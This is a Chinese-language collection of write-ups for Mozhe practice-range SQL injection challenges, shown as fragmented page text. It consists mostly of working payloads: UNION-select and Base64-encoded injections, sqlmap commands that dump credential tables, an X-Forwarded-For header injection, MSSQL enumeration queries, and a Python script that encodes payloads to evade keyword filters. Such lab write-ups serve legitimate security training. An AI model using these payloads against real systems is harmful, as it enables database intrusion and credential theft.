暂停更新,没墨币了
靶场地址:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
http://url/show.php?id=MQo=
,猜测此处需要将注入语句进行Base64
编码。-- 原语句: id=-1
id=LTE= -- 页面返回空白,存在注入
3
-- 原语句: id=1 order by 2
id=MSBvcmRlciBieSAy -- 页面正常
-- 原语句: id=1 order by 3
id=MSBvcmRlciBieSAz -- 页面报错
-- 原语句: id=-1 union select 1,2
id=LTEgdW5pb24gc2VsZWN0IDEsMg==
test
-- 原语句: id=-1 union select 1,database()
id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKQ==
data
-- 原语句: id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKQ==
id,title,main,thekey
-- 原语句: id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='data'
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J2RhdGEn
thekey
字段内容,即可成功得到Key-- 原语句: id=-1 union select 1,thekey from data
id=LTEgdW5pb24gc2VsZWN0IDEsdGhla2V5IGZyb20gZGF0YQ==
靶场地址:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe
?id=1 and 1=1 --+ -- 页面正常
?id=1 and 1=2 --+ -- 页面空白
order by
判断,可知此处列数为4id=1 order by 4 --+ -- 页面正常
id=1 order by 5 --+ -- 页面空白
SQLMap
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql
stormgroup
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql --current-db
member, notice
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup --tables
member
表中的字段:name, password, status
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member --columns
$ python sqlmap.py -u "http://219.153.49.228:49822/new_list.php?id=1" -DBMS=mysql -D stormgroup -T member -C "name,password" --dump
靶场地址:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
X-Forwarded-For
的注入Repeater
X-Forwarded-For
字段,点击发现。可以看到响应包的弹框中出现X-Forwarded-For
字段设置的IP地址post.txt
文件,将请求包全部内容粘贴到该文件中,并将X-Forwarded-For
字段修改为*
POST /index.php HTTP/1.1
Host: 219.153.49.228:46500
Content-Length: 25
Cache-Control: max-age=0
Origin: http://219.153.49.228:46500
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://219.153.49.228:46500/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: *
username=123&password=123
post.txt
文件放SQLMap
的目录下,然后运行SQLMap
,使用-r
参数指定该txt
webcalendar
$ python sqlmap.py -r post.txt --current-db
user, login
$ python sqlmap.py -r post.txt -D webcalendar --tables
id, username, password
$ python sqlmap.py -r post.txt -D webcalendar -T user --columns
$ python sqlmap.py -r post.txt -D webcalendar -T user -C username,password --dump
靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
id=1 and 1=1 -- 页面正常
id=1 and 1=2 -- 页面错误
4
id=1 order by 4 -- 页面正常
id=1 order by 5 -- 页面错误
id=-1
报错,从页面回显得知回显点为2、3
id=-1 union select 1,2,3,4
mozhe_Discuz_StormGroup
id=-1 union select 1,database(),3,4
StormGroup_member,notice
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3,4
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 1,1),3,4
id,name,password,status
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 0,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 1,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 2,1),3,4
id=-1 union select 1,(select column_name from information_schema.columns where table_name='StormGroup_member' limit 3,1),3,4
limit
爆出第2个账号及密码,解密后登录成功id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1
id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1
靶场地址:https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe
id=tingjigonggao' and 1=1 --+ -- 页面正常
id=tingjigonggao' and 1=2 --+ -- 页面错误
4
id=tingjigonggao' order by 4 --+
id=tingjigonggao' order by 5 --+
id=x
报错,从页面回显得知回显点为2、3
d=x' union select 1,2,3,4 --+
mozhe_discuz_stormgroup
id=x' union select 1,2,database(),4 --+
notice,stormgroup_member
id=x' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
stormgroup_member
表的全部字段:id,name,password,status
id=x' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='stormgroup_member' --+
name,password
字段的值d=x' union select 1,name,password,4 from stormgroup_member limit 0,1 --+
d=x' union select 1,name,password,4 from stormgroup_member limit 1,1 --+
靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe
id=2-0 -- 返回正常
id=2-1 -- 返回错误
order by
判断,可知此处列数为4id=2 order by 4 -- 返回正常
id=2 order by 5 -- 返回错误
False
,即id≠2
,此处为id=-2
union all select
,而非union select
3
个回显位为字符串型,需要用'3'
id=-2 union all select 1,2,'3',4
mozhe_db_v2
id=-2 union all select 1,db_name(),'3',4
manage
id=-2 union all select 1,(select top 1 name from mozhe_db_v2..sysobjects where xtype='u'),'3',4
-- 也可以使用information_schema.tables
id=-2 union all select 1,(select top 1 table_name from information_schema.tables),'3',4
id,username,password
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4
-- 也可以使用information_schema.columns,但是使用前面的方便遍历
id=-2 union all select 1,(select top 1 column_name from information_schema.columns where table_name='manage'),'3',4
admin_mz
,再使用第2条爆出密码id=-2 union all select 1,(select username from manage),'3',4
id=-2 union all select 1,(select username from manage),(select password from manage where username='admin_mz'),4
靶场地址:https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe
Emmm这题好水,居然还收2个墨币!
admin
,密码任意,点击登陆http://url/no.php
,然后改成yes.php
,居然就显示Key了。。。下面来一个正确的做法
admin111'2222
,密码随意,点击登陆You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2222','a','a') and password='1'' at line 1
admin','a','a') #
,密码任意。点击登陆成功获取Key靶场地址:https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe
id=1 -- 页面正常
id=-1 -- 页面错误
order by
一直没有报错,后发现需要绕过。经查询得知此题绕过需要注意以下几点:
/**/
代替,=
用like
代替id=1
后面部分进行URL编码
# !/usr/bin/env python
# -*- coding:UTF-8 -*-
# time:2019/11/9 1:03
# author:White9527
from urllib import parse
import re
# 查询语句
s1 = "/**/order/**/by/**/1"
s2 = parse.quote(s1,"utf-8")
s3 = re.findall(r'.',s2)
j = 0
for i in s3:
if (s3[j]!='%' and s3[j-1]!='%' and s3[j-2]!='%'):
s3[j] = hex(ord(s3[j]))
j=j+1
s4 = "".join(s3)
s4 = re.sub("0x","%",s4)
print(s4)
4
-- 原语句: id=1/**/order/**/by/**/4
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%34 -- 页面正常
id=1%2F%2A%2A%2F%6F%72%64%65%72%2F%2A%2A%2F%62%79%2F%2A%2A%2F%35 -- 页面错误
id=-1
报错,从页面回显得知回显点为2、3
-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34
mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,database(),3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%64%61%74%61%62%61%73%65%28%29%2C%33%2C%34
notice,stormgroup_member
-- 原语句: id=-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
stormgroup_member
表中的字段名:id,name,password,status
-- 原语句: id=-1/**/union/**/select/**/1,(group_concat(column_name)),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%28%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%29%2C%33%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%6C%69%6B%65%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31
靶场地址:https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe
id=1 -- 页面正常
id=-1 -- 页面错误
4
id=1/**/order/**/by/**/4 -- 页面正常
id=1/**/order/**/by/**/5 -- 页面错误
union
和select
,尝试大小写绕过无效,于是使用URL编码-- 原语句: id=-1/**/union/**/select/**/1,2,3,4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%33%2C%34
mozhe_discuz_stormgroup
-- 原语句: id=-1/**/union/**/select/**/1,2,database(),4
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%64%61%74%61%62%61%73%65%28%29%2C%34
notice,stormgroup_member
。这里使用group_concat()
将表名拼接后返回-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/=/**/database()
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%74%61%62%6C%65%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%73%63%68%65%6D%61%2F%2A%2A%2F%3D%2F%2A%2A%2F%64%61%74%61%62%61%73%65%28%29
stormgroup_member
表中的列名:id,length,name,password,time,status
-- 原语句: id=-1/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'stormgroup_member'
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%32%2C%67%72%6F%75%70%5F%63%6F%6E%63%61%74%28%63%6F%6C%75%6D%6E%5F%6E%61%6D%65%29%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%63%6F%6C%75%6D%6E%73%2F%2A%2A%2F%77%68%65%72%65%2F%2A%2A%2F%74%61%62%6C%65%5F%6E%61%6D%65%2F%2A%2A%2F%3D%2F%2A%2A%2F%27%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%27
name,password
字段内容,分别爆出3个账号:mozhe01,mozhe2,admin
。将最后一个admin
对应的密码MD5解密后即可成功登陆并获取Key-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/0,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%30%2C%31
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/1,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%31%2C%31
-- 原语句: id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1
id=-1%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%31%2C%6E%61%6D%65%2C%70%61%73%73%77%6F%72%64%2C%34%2F%2A%2A%2F%66%72%6F%6D%2F%2A%2A%2F%73%74%6F%72%6D%67%72%6F%75%70%5F%6D%65%6D%62%65%72%2F%2A%2A%2F%6C%69%6D%69%74%2F%2A%2A%2F%32%2C%31
靶场地址:https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe
id=1' and 1=1 --+ -- 页面正常
id=1' and 1=2 --+ -- 页面错误
7
?id=1' order by 7 --+ -- 页面正常
?id=1' order by 8 --+ -- 页面错误
2,3,4
id=-1' union select 1,2,3,4,5,6,7 --+
min_ju4t_mel1i
id=-1' union select 1,database(),3,4,5,6,7 --+
(@dmin9_td4b},notice,stormgroup_member,tdb_goods
id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() --+
id,username,password,status
id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}' --+
group_concat()
函数,但是返回的密码不方便观察,干脆使用limit
逐个返回。
status
字段均为0
,只有最后一个的status
为1
。猜测这个字段表示是否禁用。?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 0,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 1,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 2,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 3,1 --+
?id=-1' union select 1,username,password,status,5,6,7 from `(@dmin9_td4b}` limit 4,1 --+